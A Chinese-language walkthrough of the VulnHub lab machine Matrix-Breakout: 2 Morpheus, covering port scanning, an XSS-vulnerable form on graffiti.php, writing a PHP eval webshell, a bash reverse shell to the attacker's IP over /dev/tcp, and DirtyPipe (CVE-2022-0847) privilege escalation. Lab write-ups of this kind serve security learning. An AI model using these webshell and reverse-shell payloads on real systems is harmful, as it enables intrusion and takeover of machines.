MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

admin 2023年6月9日11:46:37评论59 views字数 1298阅读4分19秒阅读模式

前言

  • 靶机:MATRIX-BREAKOUT: 2 MORPHEUS
  • 下载地址:https://www.vulnhub.com/entry/matrix-breakout-2-morpheus,757/
  • 难度:Medium-Hard
  • 攻击机:Kali 2020.4
  • 攻击机IP:192.168.88.129
  • 网络模式:NAT

信息收集

  • 确定靶机IParp-scan -l

  • 确定靶机ip为:192.168.88.130

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

扫描开放端口nmap -p- 192.168.88.130开放了端口:22、80、81

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

80端口是一个网页,没什么可用信息。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

81端口是一个登录窗口,有点像Tomcat登录窗口,试了几个常见的弱口令没登进去。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

扫描目录

使用Kali自带的dirbuster,目录字典是用的是directory-list-2.3-small.txt,发现了如下目录。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

渗透过程

目录一一打开,在graffiti.php页面发现了有个提交窗口。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

提交内容会在页面上显示,试了xss,果然可以弹窗。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

尝试写入webshell,先试试<?php eval(@$_POST['cmd']); ?>,写进去没回显没法连接。抓包看,发现是写入到一个叫graffiti.txt

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

可以通过URLhttp://192.168.88.130/graffiti.txt访问。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

那么我们可以尝试写入到可执行文件test.php中。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

使用webshell管理工具蚁剑连接,连接成功。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

在根目录下发现FLAG.txt

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

内容大概意思是有个用户Cypher, 还有张图片/.cypher-neo.png可能有用。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

先把图片下载下来。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

继续翻文件,果然在home文件下发现了Cypher用户文件夹,但是没有权限。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

另一个用户文件夹thrinity可以打开,但是不知道有啥用。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

上传反弹shell到test.php,开启监听,再访问test.php,在Kali里获得webshell。<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.88.129/9999 0>&1'");?>

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

也可以直接使用蚁剑的终端。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透
MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

使用susudo -i提权失败。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透
MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

再来研究研究图片cypher-neo.png,使用Kali自带工具图片分析工具binwalk,发现图片含有一个zip包。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

提取文件后,得到两个文件,一个为空,另一个打开都不知道咋打开,遂弃。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

再看看有啥用户,除了home下提示的两个也没别的了。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

再看下系统内核版本,发现是5.x,可以使用DirtyPipe漏洞(CVE-2022-0847)进行提权。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

下载exp,https://gitcode.net/mirrors/r1is/CVE-2022-0847/-/blob/main/Dirty-Pipe.sh, 在蚁剑中上传。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

设置Dirty-Pipe.sh权限后,再执行,直接提权成功。

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

在根目录下找到第二个flag,至此渗透完毕!

MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

原文地址:https://xz.aliyun.com/t/12583

 若有侵权请联系删除

技术交流加下方vx


MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透


原文始发于微信公众号(红蓝公鸡队):MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月9日11:46:37
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   MATRIX-BREAKOUT: 2 MORPHEUS靶机渗透https://cn-sec.com/archives/1790402.html

发表评论

匿名网友 填写信息